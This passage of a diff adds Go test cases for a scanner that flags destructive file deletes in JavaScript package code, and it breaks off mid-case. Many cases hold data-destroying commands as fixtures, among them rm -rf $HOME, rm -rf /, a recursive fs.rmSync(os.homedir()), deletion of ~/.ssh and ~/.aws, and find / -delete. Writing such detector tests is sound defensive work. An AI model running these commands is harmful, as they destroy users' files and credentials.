+		// --- broad wipe -> CRITICAL ---
+		{
+			name:    "fs.rmSync(os.homedir()) broad wipe -> CRITICAL",
+			content: "const os = require('os');\nconst fs = require('fs');\nfs.rmSync(os.homedir(), { recursive: true, force: true });\n",
+			want:    true, crit: true,
+		},
+		{
+			name:    "fs.rmSync(process.env.HOME) broad wipe -> CRITICAL",
+			content: "const fs = require('fs');\nfs.rmSync(process.env.HOME, { recursive: true, force: true });\n",
+			want:    true, crit: true,
+		},
+		{
+			name:    "shell rm -rf $HOME -> CRITICAL",
+			content: "require('child_process').execSync('rm -rf $HOME');\n",
+			want:    true, crit: true,
+		},
+		{
+			name:    "shell rm -rf ~ -> CRITICAL",
+			content: "require('child_process').execSync('rm -rf ~');\n",
+			want:    true, crit: true,
+		},
+		{
+			name:    "shell rm -rf / root wipe -> CRITICAL",
+			content: "require('child_process').execSync('rm -rf /');\n",
+			want:    true, crit: true,
+		},
+		{
+			name:    "shell rm -rf /home/dev home root -> CRITICAL",
+			content: "require('child_process').execSync('rm -rf /home/dev');\n",
+			want:    true, crit: true,
+		},
+		// --- two distinct families -> CRITICAL ---
+		{
+			name:    "delete .ssh + .aws (two families) -> CRITICAL",
+			content: "const fs = require('fs');\nfs.rmSync('.ssh', { recursive: true });\nfs.rmSync('.aws', { recursive: true });\n",
+			want:    true, crit: true,
+		},
+		// --- two files SAME family stays HIGH (refinement 1) ---
+		{
+			name:    "delete .ssh/id_rsa + .ssh/known_hosts (one family) -> HIGH",
+			content: "const fs = require('fs');\nfs.unlinkSync('.ssh/id_rsa');\nfs.unlinkSync('.ssh/known_hosts');\n",
+			want:    true, crit: false,
+		},
+		// --- .ssh (fires) + .npmrc bare (does not, no partner): one family HIGH ---
+		{
+			name:    "delete .ssh + bare .npmrc (npmrc quiet) -> HIGH not CRITICAL",
+			content: "const fs = require('fs');\nfs.rmSync('.ssh', { recursive: true });\nfs.unlinkSync('.npmrc');\n",
+			want:    true, crit: false,
+		},
+
+		// --- false positives ---
+		{
+			name:    "rimraf dist is build cleanup",
+			content: "const rimraf = require('rimraf');\nrimraf('dist', () => {});\n",
+			want:    false,
+		},
+		{
+			name:    "rm -rf node_modules is cleanup",
+			content: "require('child_process').execSync('rm -rf node_modules');\n",
+			want:    false,
+		},
+		{
+			name:    "fs.rmSync ./coverage is cleanup",
+			content: "const fs = require('fs');\nfs.rmSync('./coverage', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			name:    "fs.rmSync build is cleanup",
+			content: "const fs = require('fs');\nfs.rmSync('build', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			name:    "/tmp/.ssh fixture under benign dir is not a wipe",
+			content: "const fs = require('fs');\nfs.rmSync('/tmp/.ssh', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			name:    "rm -rf /tmp/project-cache is cleanup",
+			content: "require('child_process').execSync('rm -rf /tmp/project-cache');\n",
+			want:    false,
+		},
+		{
+			name:    ".env.example sibling is not .env",
+			content: "const fs = require('fs');\nfs.unlinkSync('.env.example');\n",
+			want:    false,
+		},
+		{
+			name:    ".npmrc.sample sibling is not .npmrc",
+			content: "const fs = require('fs');\nfs.unlinkSync('.npmrc.sample');\n",
+			want:    false,
+		},
+		{
+			name:    ".ssh.bak sibling is not .ssh",
+			content: "const fs = require('fs');\nfs.unlinkSync('/home/u/.ssh.bak');\n",
+			want:    false,
+		},
+		{
+			name:    "canary.txt is not the .canary honeytoken",
+			content: "const fs = require('fs');\nfs.unlinkSync('canary.txt');\n",
+			want:    false,
+		},
+		{
+			name:    "my-canary-file is not the .canary honeytoken",
+			content: "const fs = require('fs');\nfs.unlinkSync('my-canary-file');\n",
+			want:    false,
+		},
+		{
+			name:    "bare .npmrc no partner stays quiet",
+			content: "const fs = require('fs');\nfs.unlinkSync('.npmrc');\n",
+			want:    false,
+		},
+		{
+			name:    "bare .env no partner stays quiet",
+			content: "const fs = require('fs');\nfs.unlinkSync('.env');\n",
+			want:    false,
+		},
+		{
+			name:    "constructed template prefix ${tmp}/.ssh is not a wipe",
+			content: "const fs = require('fs');\nfs.rmSync(`${tmp}/.ssh`, { recursive: true });\n",
+			want:    false,
+		},
+		{
+			name:    "constructed concat prefix tmp + '/.ssh' is not a wipe",
+			content: "const fs = require('fs');\nfs.rmSync(tmp + '/.ssh', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			name:    "comment mentioning rm -rf ~/.ssh",
+			content: "// cleanup step: rm -rf ~/.ssh if present\nconst x = 1;\n",
+			want:    false,
+		},
+		{
+			name:    "doc string of a delete command is not a call",
+			content: "const example = \"rm -rf ~/.ssh\";\nconsole.log(example);\n",
+			want:    false,
+		},
+		{
+			name:    "db.exec delete is not a bound shell or fs delete",
+			content: "const db = getDb();\ndb.exec(\"rm -rf ~/.ssh\");\n",
+			want:    false,
+		},
+		{
+			name:    "local writer.unlinkSync not bound to fs",
+			content: "const writer = makeWriter();\nwriter.unlinkSync('/home/u/.ssh');\n",
+			want:    false,
+		},
+		{
+			name:    "spawn echo with rm argv data is not a shell delete",
+			content: "const cp = require('child_process');\ncp.spawn('echo', ['rm -rf ~/.ssh']);\n",
+			want:    false,
+		},
+		{
+			name:    "spawn sh script.sh then -c positional is not a shell delete",
+			content: "const cp = require('child_process');\ncp.spawn('sh', ['script.sh', '-c', 'rm -rf ~/.ssh']);\n",
+			want:    false,
+		},
+		{
+			name:    "find ~/.ssh without -delete is a read",
+			content: "require('child_process').execSync('find ~/.ssh -type f');\n",
+			want:    false,
+		},
+		{
+			name:    "npm cache clean is not a sensitive delete",
+			content: "require('child_process').execSync('npm cache clean --force');\n",
+			want:    false,
+		},
+		{
+			name:    "os.tmpdir() delete is not a home wipe",
+			content: "const fs = require('fs');\nfs.rmSync(os.tmpdir(), { recursive: true });\n",
+			want:    false,
+		},
+		{
+			name:    ".git-credentials.bak sibling is not the credential file",
+			content: "const fs = require('fs');\nfs.unlinkSync('/home/u/.git-credentials.bak');\n",
+			want:    false,
+		},
+		{
+			// codex round 1 #1: a sensitive path after another rm operand.
+			name:    "rm -rf dist ~/.ssh (sensitive as later operand) -> HIGH",
+			content: "require('child_process').execSync('rm -rf dist ~/.ssh');\n",
+			want:    true,
+		},
+		{
+			// codex round 1 #1: a sensitive path after the -- sentinel.
+			name:    "rm -rf -- ~/.aws (after -- sentinel) -> HIGH",
+			content: "require('child_process').execSync('rm -rf -- ~/.aws');\n",
+			want:    true,
+		},
+		{
+			// codex round 1 #2: a template suffix extends the component into a
+			// constructed (unknown) path.
+			name:    "fs.rmSync(`.ssh${suffix}`) constructed suffix is not a wipe",
+			content: "const fs = require('fs');\nfs.rmSync(`.ssh${suffix}`, { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// codex round 1 #2 sibling: a concat suffix on the component.
+			name:    "fs.unlinkSync('.ssh' + suffix) concat suffix is not a wipe",
+			content: "const fs = require('fs');\nfs.unlinkSync('.ssh' + suffix);\n",
+			want:    false,
+		},
+		{
+			// codex round 2: an rm command that is only ECHOED (an argument,
+			// not a command position) is not a real delete.
+			name:    "echo of an rm command is not a delete",
+			content: "require('child_process').execSync('echo rm -rf ~/.ssh');\n",
+			want:    false,
+		},
+		{
+			// round 2 regression: a wrapper (sudo) before rm is still a delete.
+			name:    "sudo rm -rf ~/.ssh -> HIGH",
+			content: "require('child_process').execSync('sudo rm -rf ~/.ssh');\n",
+			want:    true,
+		},
+		{
+			// codex round 3 #1: a QUOTED rm inside echo is printed data, not a
+			// command (the inner quote is not a command boundary).
+			name:    "echo of a quoted rm command is not a delete",
+			content: "require('child_process').execSync('echo \"rm -rf ~/.ssh\"');\n",
+			want:    false,
+		},
+		{
+			// codex round 3 #2: ${HOME} is a home anchor for project-capable
+			// files just like $HOME and ~.
+			name:    "rm -rf ${HOME}/.npmrc (anchored) -> HIGH",
+			content: "require('child_process').execSync('rm -rf ${HOME}/.npmrc');\n",
+			want:    true,
+		},
+		{
+			// codex round 4 #1: a globbed root wipe.
+			name:    "shell rm -rf /* root glob wipe -> CRITICAL",
+			content: "require('child_process').execSync('rm -rf /*');\n",
+			want:    true, crit: true,
+		},
+		{
+			// codex round 4 #1: a globbed home wipe.
+			name:    "shell rm -rf $HOME/* home glob wipe -> CRITICAL",
+			content: "require('child_process').execSync('rm -rf $HOME/*');\n",
+			want:    true, crit: true,
+		},
+		{
+			// codex round 4 #1: /tmp/* glob is cleanup, not a wipe.
+			name:    "shell rm -rf /tmp/* glob is cleanup",
+			content: "require('child_process').execSync('rm -rf /tmp/*');\n",
+			want:    false,
+		},
+		{
+			// codex round 4 #2: modern named rimraf import (CJS destructure).
+			name:    "named rimraf destructure delete .ssh -> HIGH",
+			content: "const { rimraf } = require('rimraf');\nawait rimraf('.ssh');\n",
+			want:    true,
+		},
+		{
+			// codex round 4 #2: modern named rimraf import (ESM).
+			name:    "named rimraf ESM import delete .aws -> HIGH",
+			content: "import { rimraf } from 'rimraf';\nawait rimraf('.aws');\n",
+			want:    true,
+		},
+		{
+			// codex round 5 #1: a delete inside an if-condition is real.
+			name:    "shell if rm -rf ~/.ssh condition -> HIGH",
+			content: "require('child_process').execSync('if rm -rf ~/.ssh; then echo ok; fi');\n",
+			want:    true,
+		},
+		{
+			// codex round 5 #1: a delete inside a while-condition is real.
+			name:    "shell while rm -rf ~/.aws condition -> HIGH",
+			content: "require('child_process').execSync('while rm -rf ~/.aws; do :; done');\n",
+			want:    true,
+		},
+		{
+			// codex round 5 #2: Node does not expand ~ in an fs path, so a
+			// literal '~' is a directory named ~, not a home wipe.
+			name:    "fs.rmSync('~') literal tilde dir is not a home wipe",
+			content: "const fs = require('fs');\nfs.rmSync('~', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// codex round 5 #2: same for a literal '$HOME' fs path.
+			name:    "fs.rmSync('$HOME') literal is not a home wipe",
+			content: "const fs = require('fs');\nfs.rmSync('$HOME', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// codex round 6 #1: rimraf namespace property call.
+			name:    "rimraf namespace rr.rimraf(.ssh) -> HIGH",
+			content: "const rr = require('rimraf');\nawait rr.rimraf('.ssh');\n",
+			want:    true,
+		},
+		{
+			// codex round 6 #1: rimraf namespace .sync property call.
+			name:    "rimraf namespace rr.sync(.aws) -> HIGH",
+			content: "import * as rr from 'rimraf';\nrr.sync('.aws');\n",
+			want:    true,
+		},
+		{
+			// codex round 6 #2: echo of a wrapper-prefixed rm is printed text;
+			// the wrapper (sudo) must itself be at a command start.
+			name:    "echo sudo rm -rf ~/.ssh is printed text, not a delete",
+			content: "require('child_process').execSync('echo sudo rm -rf ~/.ssh');\n",
+			want:    false,
+		},
+		{
+			// codex round 7 #1: a .. traversal escapes the benign /tmp prefix
+			// and resolves under /home/u/.ssh.
+			name:    "fs.rmSync /tmp/../home/u/.ssh traversal is a real wipe -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('/tmp/../home/u/.ssh', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			// codex round 7 #2: $HOME_BACKUP is a different variable, not the
+			// HOME anchor, so the path is constructed/unknown.
+			name:    "shell rm -rf $HOME_BACKUP/.ssh is a constructed path",
+			content: "require('child_process').execSync('rm -rf $HOME_BACKUP/.ssh');\n",
+			want:    false,
+		},
+		{
+			// codex round 7 #2: $HOMEDIR is also a different variable.
+			name:    "shell rm -rf $HOMEDIR/.npmrc is a constructed path",
+			content: "require('child_process').execSync('rm -rf $HOMEDIR/.npmrc');\n",
+			want:    false,
+		},
+		{
+			// codex round 8 #1: an empty string literal is a no-op, not root.
+			name:    "fs.rmSync('') empty literal is not a root wipe",
+			content: "const fs = require('fs');\nfs.rmSync('', { force: true });\n",
+			want:    false,
+		},
+		{
+			// codex round 8 #2: a wrapper option between sudo and rm.
+			name:    "sudo -n rm -rf ~/.ssh -> HIGH",
+			content: "require('child_process').execSync('sudo -n rm -rf ~/.ssh');\n",
+			want:    true,
+		},
+		{
+			// codex round 8 #2: an env assignment before rm.
+			name:    "env FOO=1 rm -rf ~/.aws -> HIGH",
+			content: "require('child_process').execSync('env FOO=1 rm -rf ~/.aws');\n",
+			want:    true,
+		},
+		{
+			// codex round 9: inline require('rimraf').sync(...).
+			name:    "inline require('rimraf').sync('.ssh') -> HIGH",
+			content: "require('rimraf').sync('.ssh');\n",
+			want:    true,
+		},
+		{
+			// codex round 9: inline require('rimraf')(...) (older callable).
+			name:    "inline require('rimraf')('.aws') -> HIGH",
+			content: "require('rimraf')('.aws', () => {});\n",
+			want:    true,
+		},
+		{
+			// codex round 10 #1: rm glued to an assignment value (FOO=rm) is
+			// not a command; the command is echo.
+			name:    "FOO=rm echo ~/.ssh assignment value is not a delete",
+			content: "require('child_process').execSync('FOO=rm echo ~/.ssh');\n",
+			want:    false,
+		},
+		{
+			// codex round 10 #2: combined default rimraf ESM import.
+			name:    "combined default rimraf import delete .ssh -> HIGH",
+			content: "import rimraf, { sync } from 'rimraf';\nawait rimraf('.ssh');\n",
+			want:    true,
+		},
+		{
+			// codex round 11 #1: inline require('os').homedir() broad wipe.
+			name:    "fs.rmSync(require('os').homedir()) broad wipe -> CRITICAL",
+			content: "const fs = require('fs');\nfs.rmSync(require('os').homedir(), { recursive: true, force: true });\n",
+			want:    true, crit: true,
+		},
+		{
+			// codex round 11 #1: a mock object named os is not the os module.
+			name:    "fs.rmSync(os.homedir()) with mock os is not a home wipe",
+			content: "const os = { homedir: () => '/tmp/build' };\nconst fs = require('fs');\nfs.rmSync(os.homedir(), { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// codex round 11 #2: a local helper ending in 'require' is not the
+			// module require.
+			name:    "myrequire('rimraf')('.ssh') is not a bound rimraf delete",
+			content: "const myrequire = makeRequire();\nmyrequire('rimraf')('.ssh');\n",
+			want:    false,
+		},
+		{
+			// codex round 12 #1: /home/<u> where the username matches a benign
+			// dir name (tmp) is still a real home credential wipe.
+			name:    "fs.rmSync /home/tmp/.ssh (username tmp) -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('/home/tmp/.ssh', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			// codex round 13 #1: a filtered find rooted at $HOME deletes
+			// matching files, not the home root -> not a broad wipe.
+			name:    "find $HOME -name '*.log' -delete is filtered cleanup",
+			content: "require('child_process').execSync('find $HOME -name \"*.log\" -delete');\n",
+			want:    false,
+		},
+		{
+			// codex round 13 #1 regression: find rooted at a sensitive path
+			// still fires.
+			name:    "find ~/.ssh -type f -delete -> HIGH",
+			content: "require('child_process').execSync('find ~/.ssh -type f -delete');\n",
+			want:    true,
+		},
+		{
+			// codex round 14 #1: an fs glob literal is not shell-expanded, so
+			// /home/u/* is a literal path, not a home wipe.
+			name:    "fs.rmSync('/home/u/*') literal glob is not a wipe",
+			content: "const fs = require('fs');\nfs.rmSync('/home/u/*', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// codex round 14 #2: find with multiple roots must scan each.
+			name:    "find /tmp ~/.ssh -type f -delete (second root sensitive) -> HIGH",
+			content: "require('child_process').execSync('find /tmp ~/.ssh -type f -delete');\n",
+			want:    true,
+		},
+		{
+			// codex round 14 #3: a wrapper option that takes a value
+			// (sudo -u root) still precedes a real delete.
+			name:    "sudo -u root rm -rf ~/.ssh -> HIGH",
+			content: "require('child_process').execSync('sudo -u root rm -rf ~/.ssh');\n",
+			want:    true,
+		},
+		{
+			// codex round 15 #1: a partially quoted home glob ("$HOME"/*).
+			name:    `shell rm -rf "$HOME"/* partial-quote home glob -> CRITICAL`,
+			content: "require('child_process').execSync('rm -rf \"$HOME\"/*');\n",
+			want:    true, crit: true,
+		},
+		{
+			// codex round 15 #2: find with a leading global option (-L).
+			name:    "find -L ~/.ssh -type f -delete (leading option) -> HIGH",
+			content: "require('child_process').execSync('find -L ~/.ssh -type f -delete');\n",
+			want:    true,
+		},
+		{
+			// codex round 16 #1: a shell command assembled by concatenation is
+			// dynamic; a later fragment is not a real operand.
+			name:    "execSync('rm -rf ' + tmp + '/.ssh') concat command is not a wipe",
+			content: "require('child_process').execSync('rm -rf ' + tmp + '/.ssh');\n",
+			want:    false,
+		},
+		{
+			// codex round 16 #2: Node does not expand ~ in an fs literal, so
+			// '~/.ssh' is a literal path, not the home credential store.
+			name:    "fs.rmSync('~/.ssh') literal tilde prefix is not a home path",
+			content: "const fs = require('fs');\nfs.rmSync('~/.ssh', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// codex round 16 #2: same for a literal $HOME prefix in fs.
+			name:    "fs.unlinkSync('$HOME/.aws') literal is not a home path",
+			content: "const fs = require('fs');\nfs.unlinkSync('$HOME/.aws');\n",
+			want:    false,
+		},
+		{
+			// codex round 17: a -delete substring in a filename pattern is not
+			// the find -delete predicate.
+			name:    "find ~/.ssh -name '*-delete' (no real -delete) is a read",
+			content: "require('child_process').execSync(\"find ~/.ssh -name '*-delete'\");\n",
+			want:    false,
+		},
+		{
+			// codex round 18 #1: a concatenated -c script is dynamic; the
+			// sibling .ssh.bak suffix must not be read as .ssh.
+			name:    "spawn sh -c concat script ('rm -rf ~/.ssh' + '.bak') is not a wipe",
+			content: "const cp = require('child_process');\ncp.spawn('sh', ['-c', 'rm -rf ~/.ssh' + '.bak']);\n",
+			want:    false,
+		},
+		{
+			// codex round 18 #2: in an fs path * is a literal byte, so .ssh* is
+			// a different file than .ssh.
+			name:    "fs.rmSync('/home/u/.ssh*') literal glob byte is not .ssh",
+			content: "const fs = require('fs');\nfs.rmSync('/home/u/.ssh*', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// codex round 19 #2: a concatenated execaCommand is dynamic.
+			name:    `execaCommand('sh -c "rm -rf ~/.ssh"' + '.bak') concat is not a wipe`,
+			content: "const { execaCommand } = require('execa');\nawait execaCommand('sh -c \"rm -rf ~/.ssh\"' + '.bak');\n",
+			want:    false,
+		},
+		{
+			// PR scope (spec): a direct program-API delete spawn('rm', [...])
+			// is intentionally out of scope (no argv parsing) and stays quiet.
+			name:    "spawn('rm', ['-rf', '/home/u/.ssh']) program-API delete is out of scope",
+			content: "const cp = require('child_process');\ncp.spawnSync('rm', ['-rf', '/home/u/.ssh']);\n",
+			want:    false,
+		},
+		{
+			// codex round 20 #1: an fs path with a method-call tail is dynamic.
+			name:    "fs.rmSync('.ssh'.replace(...)) method-call tail is not a wipe",
+			content: "const fs = require('fs');\nfs.rmSync('.ssh'.replace('.ssh', '.ssh.bak'), { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// codex round 20 #2: an argv -c script with a method-call tail.
+			name:    "spawn sh -c script with .replace tail is not a wipe",
+			content: "const cp = require('child_process');\ncp.spawn('sh', ['-c', 'rm -rf ~/.ssh'.replace('.ssh', '.ssh.bak')]);\n",
+			want:    false,
+		},
+		{
+			// codex round 20 #3: a delete inside backtick command substitution
+			// is executed.
+			name:    "shell echo `rm -rf ~/.ssh` command substitution -> HIGH",
+			content: "require('child_process').execSync('echo `rm -rf ~/.ssh`');\n",
+			want:    true,
+		},
+		{
+			// codex round 21 #1: a shell glob expands, so rm -rf ~/.ssh* can
+			// delete ~/.ssh (the * is a boundary for shell, literal for fs).
+			name:    "shell rm -rf ~/.ssh* glob -> HIGH",
+			content: "require('child_process').execSync('rm -rf ~/.ssh*');\n",
+			want:    true,
+		},
+		{
+			// review P1: unlink cannot remove a directory, so unlinkSync of a
+			// home directory is inert, not a broad wipe.
+			name:    "fs.unlinkSync('/home/dev') cannot remove a directory",
+			content: "const fs = require('fs');\nfs.unlinkSync('/home/dev');\n",
+			want:    false,
+		},
+		{
+			// review P1: unlink of literal root is inert.
+			name:    "fs.unlinkSync('/') cannot remove root",
+			content: "const fs = require('fs');\nfs.unlinkSync('/');\n",
+			want:    false,
+		},
+		{
+			// review P1: unlink of a credential-store directory is inert.
+			name:    "fs.unlinkSync('.ssh') (a directory) is inert",
+			content: "const fs = require('fs');\nfs.unlinkSync('.ssh');\n",
+			want:    false,
+		},
+		{
+			// review P1: removeSync is fs-extra, not core fs, so a core fs
+			// binding cannot call it.
+			name:    "core fs.removeSync('.ssh') is not a real method",
+			content: "const fs = require('fs');\nfs.removeSync('.ssh');\n",
+			want:    false,
+		},
+		{
+			// review P1 regression: fs-extra binding CAN call removeSync.
+			name:    "fs-extra removeSync('.ssh') -> HIGH",
+			content: "const fse = require('fs-extra');\nfse.removeSync('.ssh');\n",
+			want:    true,
+		},
+		{
+			// review P1 regression: unlink of a FILE inside a sensitive dir is a
+			// real delete (the target is a file, not the directory).
+			name:    "fs.unlinkSync('.ssh/id_rsa') (a file) -> HIGH",
+			content: "const fs = require('fs');\nfs.unlinkSync('.ssh/id_rsa');\n",
+			want:    true,
+		},
+		{
+			// review P2: a backtick template `${HOME}` is JS interpolation of a
+			// JS const, not a shell variable, so the command is dynamic.
+			name:    "execSync template literal ${HOME}/.npmrc is JS interpolation, not shell",
+			content: "const HOME = '/tmp/build';\nrequire('child_process').execSync(`rm -rf ${HOME}/.npmrc`);\n",
+			want:    false,
+		},
+		{
+			// review round 2 P1: fs.rm without { recursive: true } cannot remove
+			// a populated home directory, so it is not a broad wipe.
+			name:    "fs.rmSync(os.homedir()) without recursive cannot wipe home",
+			content: "const os = require('os');\nconst fs = require('fs');\nfs.rmSync(os.homedir());\n",
+			want:    false,
+		},
+		{
+			// review round 2 P1: fs.rm without recursive cannot remove the .ssh
+			// directory.
+			name:    "fs.rmSync('.ssh') without recursive cannot remove a directory",
+			content: "const fs = require('fs');\nfs.rmSync('.ssh');\n",
+			want:    false,
+		},
+		{
+			// review round 2 P1: shell rm without -r cannot remove a directory.
+			name:    "shell rm ~/.ssh without -r cannot remove a directory",
+			content: "require('child_process').execSync('rm ~/.ssh');\n",
+			want:    false,
+		},
+		{
+			// review round 2 P1: rmdir removes only empty/final dirs, so rmdir of
+			// root (always populated) is inert, not a broad wipe.
+			name:    "shell rmdir / is not a recursive broad wipe",
+			content: "require('child_process').execSync('rmdir /');\n",
+			want:    false,
+		},
+		{
+			// review round 2 P1: fs.rmdirSync of root cannot recursively wipe.
+			name:    "fs.rmdirSync('/') is not a recursive broad wipe",
+			content: "const fs = require('fs');\nfs.rmdirSync('/');\n",
+			want:    false,
+		},
+		{
+			// review round 2 P1 positive: rm -rf is recursive, so ~/.ssh fires.
+			name:    "shell rm -rf ~/.ssh recursive directory delete -> HIGH",
+			content: "require('child_process').execSync('rm -rf ~/.ssh');\n",
+			want:    true,
+		},
+		{
+			// review round 2 P1 positive: fs.rm with { recursive: true } removes
+			// the .ssh directory.
+			name:    "fs.rmSync('.ssh', { recursive: true }) -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('.ssh', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			// review round 2 P1 positive: recursive rm of the home root is a
+			// broad wipe -> CRITICAL.
+			name:    "fs.rmSync(os.homedir(), { recursive: true }) broad wipe -> CRITICAL",
+			content: "const os = require('os');\nconst fs = require('fs');\nfs.rmSync(os.homedir(), { recursive: true, force: true });\n",
+			want:    true,
+			crit:    true,
+		},
+		{
+			// review round 2 capability check: rmdir is directory-final capable,
+			// so attempting to remove the .ssh directory fires.
+			name:    "shell rmdir ~/.ssh (directory-final) -> HIGH",
+			content: "require('child_process').execSync('rmdir ~/.ssh');\n",
+			want:    true,
+		},
+		{
+			// review round 2 capability check: a flag-less rm still deletes a
+			// FILE, so a home-anchored credential file fires.
+			name:    "shell rm ~/.npmrc (a file, no -r needed) -> HIGH",
+			content: "require('child_process').execSync('rm ~/.npmrc');\n",
+			want:    true,
+		},
+		{
+			// review round 3 P2: { recursive: false } does not enable recursion,
+			// so it cannot remove a directory.
+			name:    "fs.rmSync('.ssh', { recursive: false }) cannot remove a directory",
+			content: "const fs = require('fs');\nfs.rmSync('.ssh', { recursive: false });\n",
+			want:    false,
+		},
+		{
+			// review round 3 P2: { recursive: false } cannot wipe the home root.
+			name:    "fs.rmSync(os.homedir(), { recursive: false }) cannot wipe home",
+			content: "const os = require('os');\nconst fs = require('fs');\nfs.rmSync(os.homedir(), { recursive: false });\n",
+			want:    false,
+		},
+		{
+			// review round 3 P2: a trailing slash still names the directory, so
+			// unlink (file-only) cannot remove it.
+			name:    "fs.unlinkSync('/home/u/.ssh/') trailing slash is still the directory",
+			content: "const fs = require('fs');\nfs.unlinkSync('/home/u/.ssh/');\n",
+			want:    false,
+		},
+		{
+			// review round 3 P2: shell rm without -r cannot remove ~/.ssh/ even
+			// with a trailing slash.
+			name:    "shell rm ~/.ssh/ trailing slash without -r cannot remove a directory",
+			content: "require('child_process').execSync('rm ~/.ssh/');\n",
+			want:    false,
+		},
+		{
+			// review round 3 positive: a recursive rm of ~/.ssh/ (trailing slash)
+			// still fires.
+			name:    "shell rm -rf ~/.ssh/ trailing slash recursive -> HIGH",
+			content: "require('child_process').execSync('rm -rf ~/.ssh/');\n",
+			want:    true,
+		},
+		{
+			// review round 3 positive: a quoted recursive option key still grants
+			// recursion.
+			name:    "fs.rmSync('.aws', { \"recursive\": true }) quoted key -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('.aws', { \"recursive\": true });\n",
+			want:    true,
+		},
+		{
+			// review round 4 P2: a relative fixture path that merely contains a
+			// `home` segment is not home-anchored, so a project-capable file
+			// (.npmrc) needs a partner.
+			name:    "relative vendor/home/user/.npmrc is not home-anchored",
+			content: "const fs = require('fs');\nfs.unlinkSync('vendor/home/user/.npmrc');\n",
+			want:    false,
+		},
+		{
+			// review round 4 P2: same for a `Users` segment in a relative path.
+			name:    "relative fixtures/Users/alice/.env is not home-anchored",
+			content: "const fs = require('fs');\nfs.unlinkSync('fixtures/Users/alice/.env');\n",
+			want:    false,
+		},
+		{
+			// review round 4 P2: fs/promises has no *Sync methods, so the call
+			// does not exist and deletes nothing.
+			name:    "fs/promises alias rmSync does not exist",
+			content: "const fs = require('fs/promises');\nfs.rmSync('.ssh', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// review round 4 P2: fs.promises namespace rmSync does not exist.
+			name:    "fs.promises namespace rmSync does not exist",
+			content: "const fs = require('fs');\nfs.promises.rmSync('.ssh', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// review round 4 P2: { promises: fsp } rename, then a *Sync method.
+			name:    "destructured promises rename rmSync does not exist",
+			content: "const { promises: fsp } = require('fs');\nfsp.rmSync('.ssh', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// review round 4 positive: the async fs/promises rm DOES exist and
+			// deletes the directory.
+			name:    "fs/promises alias rm (async) -> HIGH",
+			content: "const fs = require('fs/promises');\nfs.rm('.ssh', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			// review round 4 positive: an ABSOLUTE home prefix still anchors a
+			// project-capable file.
+			name:    "absolute /home/dev/.npmrc is home-anchored -> HIGH",
+			content: "const fs = require('fs');\nfs.unlinkSync('/home/dev/.npmrc');\n",
+			want:    true,
+		},
+		{
+			// review round 5 P2: a *Sync local destructured from fs/promises does
+			// not exist (fs/promises is async-only).
+			name:    "destructured { rmSync } from fs/promises does not exist",
+			content: "const { rmSync } = require('fs/promises');\nrmSync('.ssh', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// review round 5 P2 positive: the async { rm } destructure DOES exist.
+			name:    "destructured { rm } from fs/promises (async) -> HIGH",
+			content: "const { rm } = require('fs/promises');\nrm('.ssh', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			// review round 5 P2: an UNFILTERED find -delete wipes the whole root,
+			// so find $HOME -delete is a broad home wipe -> CRITICAL.
+			name:    "shell find $HOME -delete unfiltered broad wipe -> CRITICAL",
+			content: "require('child_process').execSync('find $HOME -delete');\n",
+			want:    true,
+			crit:    true,
+		},
+		{
+			// review round 5 P2: find / -delete is a root wipe.
+			name:    "shell find / -delete unfiltered root wipe -> CRITICAL",
+			content: "require('child_process').execSync('find / -delete');\n",
+			want:    true,
+			crit:    true,
+		},
+		{
+			// review round 5: a FILTERED find narrows the delete to matched
+			// files, so the broad root is not itself a wipe.
+			name:    "shell find $HOME -name '*.log' -delete is filtered, not a broad wipe",
+			content: "require('child_process').execSync('find $HOME -name \"*.log\" -delete');\n",
+			want:    false,
+		},
+		{
+			// review round 5 P2: a `$HOME`/`~` past the first token char is not a
+			// home anchor; the path is relative.
+			name:    "shell rm -f build$HOME/.npmrc is not home-anchored",
+			content: "require('child_process').execSync('rm -f build$HOME/.npmrc');\n",
+			want:    false,
+		},
+		{
+			// review round 5 P2: same for a `~` mid-token.
+			name:    "shell rm -f foo~/.npmrc is not home-anchored",
+			content: "require('child_process').execSync('rm -f foo~/.npmrc');\n",
+			want:    false,
+		},
+		{
+			// review round 5 positive: a real ~-anchored credential file fires.
+			name:    "shell rm ~/.npmrc (home-anchored file) -> HIGH",
+			content: "require('child_process').execSync('rm ~/.npmrc');\n",
+			want:    true,
+		},
+		{
+			// review round 6 P2: a combined fs/promises import records the
+			// default alias as promises-only, so its *Sync method does not exist.
+			name:    "combined import fsp, { rm } from fs/promises -> rmSync does not exist",
+			content: "import fsp, { rm } from 'node:fs/promises';\nfsp.rmSync('.ssh', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// review round 6 positive: the async rm on the combined-import alias
+			// DOES exist.
+			name:    "combined import fsp from fs/promises -> fsp.rm (async) -> HIGH",
+			content: "import fsp, { stat } from 'fs/promises';\nfsp.rm('.ssh', { recursive: true });\n",
+			want:    true,
+		},
+		{
+			// review round 7 P2: /root is root's home dir (common when hooks run
+			// as root in containers/CI), so a recursive wipe is CRITICAL.
+			name:    "fs.rmSync('/root', { recursive: true }) wipes root's home -> CRITICAL",
+			content: "const fs = require('fs');\nfs.rmSync('/root', { recursive: true });\n",
+			want:    true,
+			crit:    true,
+		},
+		{
+			// review round 7 P2: shell rm -rf /root broad wipe.
